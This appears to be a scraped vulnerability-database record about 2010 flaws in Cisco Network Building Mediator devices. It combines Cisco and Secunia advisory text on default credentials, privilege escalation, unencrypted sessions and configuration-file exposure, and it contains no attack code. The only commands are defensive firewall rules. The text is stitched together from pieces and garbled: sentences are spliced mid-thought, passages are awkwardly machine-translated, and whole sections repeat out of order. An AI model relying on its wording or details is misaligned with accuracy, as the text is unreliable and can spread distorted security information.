INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0903 | CVE-2010-0597 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 allows remote authenticated users to read or modify the device configuration, and gain privileges or cause a denial of service (device reload), via a (1) XML RPC or (2) XML RPC over HTTPS request, aka Bug ID CSCtb83618. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): Operator workstation Cisco Network Building Mediator did not protect unauthorized interception of sessions, malicious users could intercept sessions, obtain arbitrary authentication information, and use this information to control devices. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Attackers can perform attacks and read configuration files via XML RPC or XML RCP over the HTTPS protocol. This issue is tracked by Cisco Bug ID CSCtb83618.
An authenticated attacker can exploit this issue to read and modify configuration settings, gaining elevated privileges. This may lead to a full compromise of the affected device. In addition, attackers can leverage this issue to cause the device to reload; successive attacks will result in a prolonged denial-of-service. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0902 | CVE-2010-0599 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not encrypt XML RPC sessions from operator workstations, which allows remote attackers to discover Administrator credentials by sniffing the network, aka Bug ID CSCtb83505. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The problem is Bug ID : CSCtb83505 It is a problem.Intercepted by a third party Administrator Authentication information may be overlooked. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. There are several security vulnerabilities in Cisco Network Building Mediator, as follows: - Default Authentication Credentials (CVE-2010-0595): Multiple predefined users on the device, including administrator user accounts using default authentication information, any network access device Users can log in to the control system as an administrator.-Privilege Escalation (CVE-2010-0596, CVE-2010-0597): Vulnerability allows unauthorized users to read and modify device configurations, malicious users must be able to successfully authenticate, but do not require administrator privileges Or modify the device configuration if you know the administrator to verify the credentials. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Attackers can perform attacks and read configuration files via XML RPC or XML RCP over the HTTPS protocol.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks and possibly a full compromise of the affected device.
This issue is tracked by Cisco Bug ID CSCtb83618. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this
vulnerability can be exploited to reload the affected device. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
